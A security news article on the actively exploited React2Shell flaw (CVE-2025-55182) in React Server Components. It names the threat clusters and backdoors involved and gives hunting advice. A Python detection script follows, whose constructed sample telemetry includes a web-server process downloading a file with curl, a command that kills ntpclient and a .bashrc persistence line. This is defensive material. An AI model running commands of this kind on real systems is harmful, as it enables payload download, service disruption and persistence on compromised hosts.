The Next Log4Shell? Global Hackers Weaponize React2Shell for RCE and Cloud Takeovers
A critical vulnerability in the widely used JavaScript library React, dubbed React2Shell, is already being exploited at scale. According to Google, at least five newly identified Chinese espionage groups, “Iran-linked” threat actors, and common cybercriminals have joined the wave of attacks. Tracked as CVE-2025-55182, the flaw allows an unauthenticated attacker to remotely execute code on a vulnerable system—effectively turning exposed servers into entry points for backdoors, tunneling tools, and cryptocurrency miners within minutes.
The React development team disclosed the bug on December 3, and attacks began almost immediately. Amazon’s threat intelligence team reported that Chinese state-aligned groups, including Earth Lamia and Jackpot Panda, started probing the vulnerability within hours of its public disclosure. Palo Alto Networks’ Unit 42 estimates that more than 50 organizations across multiple industries have already been affected, with signs of exploitation also linked to North Korean actors.
Google further notes that, beyond previously known players, React2Shell is being actively leveraged by at least five additional groups it associates with the People’s Republic of China. Financially motivated attackers are also in the mix, deploying XMRig after compromise to conduct illicit cryptomining. In addition, Google references “Iran-linked actors,” though without specifying their identities or post-compromise objectives.
Google’s researchers also highlight heightened activity around CVE-2025-55182 on underground forums, where participants are openly discussing the vulnerability, sharing scanner links, proof-of-concept exploits, and accounts of successful attacks. In practice, this follows a familiar pattern for high-profile, “hot” vulnerabilities: once functional tooling becomes available, it is rapidly adopted by a broad spectrum of actors, ranging from espionage groups to purely criminal operations.
Within the Beijing-linked activity set, Google identifies several distinct clusters. UNC6600 exploits the flaw to deploy the Minocat tunneler and establish persistence on compromised systems. UNC6586 uses React2Shell to install the Snowlight backdoor, with telemetry revealing HTTP GET requests to command-and-control infrastructure that delivers additional payloads disguised as legitimate files.
Another cluster, UNC6588, downloads the Compood backdoor following exploitation, while UNC6603 deploys an updated version of Hisonic. According to Google Threat Intelligence, UNC6603’s activity is focused on cloud infrastructure—particularly AWS and Alibaba Cloud instances across the Asia-Pacific region. Finally, UNC6595, also linked to the PRC, abuses the vulnerability to deploy Angryrebel.Linux, primarily targeting infrastructure hosted on international VPS providers.
React’s troubles do not end there. In addition to CVE-2025-55182, three more vulnerabilities have been disclosed: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. These flaws enable denial-of-service attacks and, in certain scenarios, may lead to the leakage of Server Function source code.
To mitigate the worst-case risks posed by all four vulnerabilities, organizations are strongly advised to patch affected React Server Components as soon as possible and to closely monitor network traffic for outbound connections matching the indicators of compromise detailed in Google’s report—particularly wget or cURL commands launched by web server processes. As additional signs of compromise, Google recommends hunting for newly created hidden directories such as $HOME/.systemd-utils, unauthorized termination of processes including ntpclient, and the injection of malicious execution logic into shell configuration files, for example $HOME/.bashrc.
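As an added example, not taken from the article or from Google’s report, the script below turns the hunting guidance above into rules run over constructed process-start events and a shell configuration file; the web-server process names, the kill-command pattern and the sample telemetry are assumptions made for this example.

```python
"""Hunting rules for the post-exploitation signs named in the React2Shell reporting."""
import re
from typing import Iterable

# Assumed names of processes that serve React Server Components (not from the report).
WEB_SERVER_PARENTS = {"node", "next-server", "next", "bun"}
# Page-listed artefact: the hidden staging directory under $HOME.
HIDDEN_DIR_RE = re.compile(r"(^|/|\s)\.systemd-utils\b")
# Assumed pattern for the "unauthorized termination of ntpclient" sign.
KILL_NTPCLIENT_RE = re.compile(r"\b(p?kill|killall)\b.*\bntpclient\b")


def flag_process_events(events: Iterable[dict]) -> list[str]:
    """Return one finding per process-start event that matches a hunting rule."""
    findings = []
    for ev in events:
        parent, cmd = ev["parent"], ev["cmd"]
        parts = cmd.split()
        argv0 = parts[0] if parts else ""
        # Rule 1: wget/curl launched by a web-server process.
        if parent in WEB_SERVER_PARENTS and argv0 in {"wget", "curl"}:
            findings.append(f"downloader from web server: {parent} -> {cmd}")
        # Rule 2: ntpclient being killed.
        if KILL_NTPCLIENT_RE.search(cmd):
            findings.append(f"ntpclient termination: {cmd}")
        # Rule 3: anything referencing the hidden staging directory.
        if HIDDEN_DIR_RE.search(cmd):
            findings.append(f"hidden dir reference: {cmd}")
    return findings


def flag_shell_config_lines(text: str) -> list[str]:
    """Return .bashrc-style lines that reference the hidden dir or run a downloader at login."""
    return [ln for ln in text.splitlines()
            if HIDDEN_DIR_RE.search(ln) or re.match(r"\s*(wget|curl)\b", ln)]


# Constructed sample telemetry; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"parent": "node", "cmd": "curl -s http://example.invalid/x -o /tmp/x"},
    {"parent": "bash", "cmd": "curl https://registry.npmjs.org/react"},
    {"parent": "sh", "cmd": "pkill -9 ntpclient"},
    {"parent": "node", "cmd": "mkdir -p /home/app/.systemd-utils"},
]
SAMPLE_BASHRC = "export PATH=$PATH:/usr/local/bin\n/home/app/.systemd-utils/run &\n"

if __name__ == "__main__":
    for finding in flag_process_events(SAMPLE_EVENTS) + flag_shell_config_lines(SAMPLE_BASHRC):
        print(finding)
```

In production the events would come from an EDR or auditd feed rather than the inline list, and the web-server names should be set to whatever actually serves the application.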